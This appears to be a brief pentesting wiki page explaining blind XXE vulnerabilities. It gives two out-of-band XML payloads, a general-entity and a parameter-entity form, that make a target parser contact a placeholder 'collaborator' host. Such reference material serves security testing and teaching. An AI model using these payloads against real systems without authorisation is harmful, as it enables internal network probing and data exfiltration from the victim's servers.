Blind XXE
What is it?
Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application.
Exploitation
Blind XXE using OOB
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
<bar>&xxe;</bar>
</foo>
Blind XXE using OOB with XML parameter entities
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>
Last updated
Was this helpful?